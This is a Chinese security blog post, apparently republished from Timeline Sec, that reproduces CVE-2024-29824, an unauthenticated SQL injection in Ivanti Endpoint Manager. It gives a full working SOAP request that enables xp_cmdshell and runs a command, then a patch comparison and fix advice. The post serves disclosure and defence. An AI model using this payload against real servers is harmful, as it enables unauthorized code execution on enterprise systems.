Loading [MathJax]/jax/input/TeX/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2024-29824:Ivanti EPM SQL注入漏洞

CVE-2024-29824:Ivanti EPM SQL注入漏洞

作者头像
Timeline Sec
发布于 2024-06-21 00:45:34
发布于 2024-06-21 00:45:34
78900
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:0
代码可运行

0x01 简介

Ivanti Endpoint Manager (EPM) 是一款由 Ivanti 公司开发的综合性端点管理解决方案。它旨在帮助企业有效管理和保护其网络中的所有端点设备,包括桌面、笔记本电脑、服务器、移动设备和虚拟环境。

0x02 漏洞概述

漏洞编号:CVE-2024-29824

攻击者可以利用该漏洞进行未授权的 SQL 注入并可以执行系统任意代码。官方的公告中提出的是:

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Ivanti EPM 2022 SU5 及更早版本的核心服务器中存在未指定的 SQL 注入漏洞,允许同一网络内未经身份验证的攻击者执行任意代码。(此设备内网环境中使用偏多)

0x03 影响版本

version <= Ivanti EPM 2022 SU5

0x04 环境搭建

下载安装包,需要注意的是:Ivanti Endpoint Manager 需要安装 Windows Server

然后一直点下一步就好了,安装过程大概需要 30 分钟左右,由于并没有许可,所以我们选择试用。

激活之后访问 https://IP 即可,这里访问首页会得到如下错误

这个错误并不影响我们漏洞复现,因此可以不纠结这个错误

0x05 漏洞复现

使用 BP 发送请求

使用 Process Hacker 查看进程,可以到 calc.exe 已经在后台运行,执行命令成功。

完整数据包:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
POST /WSStatusEvents/EventHandler.asmx HTTP/1.1
Host: host
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/soap+xml
Content-Length: 720

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'calc.exe'--</status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>

0x06 补丁对比

具体的分析可以看 horizon3

JetBrains dotPeek 搜索函数可以使用 Navigate->Go to Symbol... 进行搜索。

在 2022 SU5 中 RecordGoodApp 函数内容如下:

在这段代码中开发直接将用户输入与 SQL 语句通过字符串拼接在一起,最终导致了 SQL 注入并可以执行系统命令。而在补丁中

开发者将 SQL 查询改为了参数化查询,将用户的输入作为参数传递进去,有效防止了 SQL 注入

0x07 修复方式

  1. 更新补丁,可以在 https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US 下载该漏洞的补丁
  2. 不要开发到公网上

参考链接

  • https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/
  • https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-06-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
数据库的一些注入技巧-sqlserver
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password ='';
Jumbo
2019/11/05
7090
【漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入
泛微E-Cology9 是泛微网络科技股份有限公司开发的一款高效、灵活、全面的企业信息化办公系统。 泛微E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。
没事就要多学习
2024/08/11
1.2K0
【漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入
CVE-2024-21893:Ivanti Connect Secure SSRF to RCE
Ivanti Connect Secure 为远程和移动用户提供了一个无缝的、具有成本效益的SSL VPN 解决方案,使他们能随时随地从任何可上网的设备访问企业资源。
Timeline Sec
2024/03/26
1.8K0
CVE-2024-21893:Ivanti Connect Secure SSRF to RCE
经验分享 | mssql注入实战总结之狠快准绕
—-ctf.show
F12sec
2022/09/29
1.8K0
经验分享 | mssql注入实战总结之狠快准绕
【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
没事就要多学习
2024/07/18
1.1K0
【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞
注入学习1:SQL注入语句大全
之前做了xss预防,以及些许的注入预防了,但是不够全面,如果还是搜集了下一些常用的注入手段,以此用来进行更好的预防.
@坤的
2018/09/21
4.7K0
干货 | MSSQL注入和漏洞利用姿势总结
Microsoft SQL Server 是微软开发的关系型数据库管理系统。作为数据库服务器,它是一种软件产品,主要功能是根据其他软件应用程序的请求存储和检索数据,这些应用程序可以在同一台计算机上运行,也可以在网络(包括 Internet)上的另一台计算机上运行。SQL Server 默认开放的端口是 TCP 1433。
HACK学习
2023/01/03
7.5K0
干货 | MSSQL注入和漏洞利用姿势总结
【实战篇】从mssql注入到上线CobaltStrike
//inetpub文件夹是IIS(Internet Information Services)中Windows站点的根。
一名白帽的成长史
2021/04/08
3.1K0
SQL注入攻防入门详解
毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门查看大量前辈们的心得,这方面的资料颇多,将其精简出自己觉得重要的,就成了该文) 下面的程序方案是采用 ASP.NET + MSSQL,其他技术在设置上会有少许不同。 示例程序下载:
前朝楚水
2018/04/03
2.6K0
SQL注入攻防入门详解
一个人的武林:内网渗透测试思路(二)
写在前面 跟web渗透(上一篇)不同,内网渗透需要更多的随机性和突破口,情况较为复杂,遇到障碍,有时可以换种思路突破,很多时候则无奈的只能止步于此。下面分享一些自己总结的内网渗透经验。主要是以windows下的操作为主。 0×01 斗转星移 (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一、通过常规web渗透,已经拿到webshell。那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接。 ① Webshel
FB客服
2018/02/05
2.6K0
一个人的武林:内网渗透测试思路(二)
从 SQL Server 注入到 getshell
当时是查看网页源代码,有两个可疑接口,一个是初始化密码借口,访问返回空白页面,没有什么用
重生信息安全
2020/03/06
7.4K1
腾讯安全威胁情报中心推出2024年9月必修安全漏洞清单
所谓必修漏洞,就是运维人员必须修复、不可拖延、影响范围较广的漏洞,被黑客利用并发生入侵事件后,会造成十分严重的后果。
安全攻防团队
2024/10/21
4001
腾讯安全威胁情报中心推出2024年9月必修安全漏洞清单
复习 - MSSQL注入
MSSQL MSSQL和MySQL注入类似,但在数据结构特定函数名称上存在差异。且MSSQL与Windows平台的高契合度,使其可以使用Windows身份验证,导致其运行权限较高,若没有对权限进行限制,当存在SQL注入时,所造成的后果一般比MySQL更严重。 靶场地址:墨者学院 - SQL手工注入漏洞测试(Sql Server数据库) 信息收集 -- 查询版本 select @@VERSION select * from Users where id='1' and @@VERSION like '%14%
Naraku
2021/07/29
2.4K0
从 SQL Server 注入到 远程连接桌面
抓包 sqlmap 跑了下发现不行: sqlmap -r 1.txt --risk 3 --level 3 --dbms "Microsoft SQL Server" --second-order "http://123.xxx.xxx.180:2001/error.aspx"
重生信息安全
2020/03/06
1.9K0
SQL注入语句和方法总结
前提需要工具(SQL Query Analyzer和SqlExec Sunx Version)
沙漠尽头的狼
2021/12/01
1.2K0
用友GRP-U8SQL注入&远程代码执行漏洞复现
用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-u8被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有限制外部实体的加载,导致可加载恶意外部文件,可以执行SQL语句,甚至可以执行系统命令。
用户6343818
2021/07/08
3.9K0
用友GRP-U8SQL注入&远程代码执行漏洞复现
【权限提升】六种数据库提权&口令获取
通过webshell查看phpmyadmin中配置文件(confiug.default.php)获取数据库账号密码
没事就要多学习
2024/07/18
2900
【权限提升】六种数据库提权&口令获取
sql注入技术大总结
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()# 从所有的表里边找到这个库名里不重复的表名
黑战士
2024/04/13
3270
weblogic中间件漏洞总结
WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
亿人安全
2022/06/30
1.5K0
weblogic中间件漏洞总结
SQL 基础学习参考资料分享
信安之路的小白成长阶段目前处于 SQL 的基础学习阶段,在每一个学习阶段都会分享一些参考资料给大家,即使大家未能成为学习的主力,但是也希望更多想要参与学习的同学跟着这个学习计划一直前行,详细情况请看公众号菜单中间一栏的成长计划。
信安之路
2019/08/15
1.2K0
相关推荐
数据库的一些注入技巧-sqlserver
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验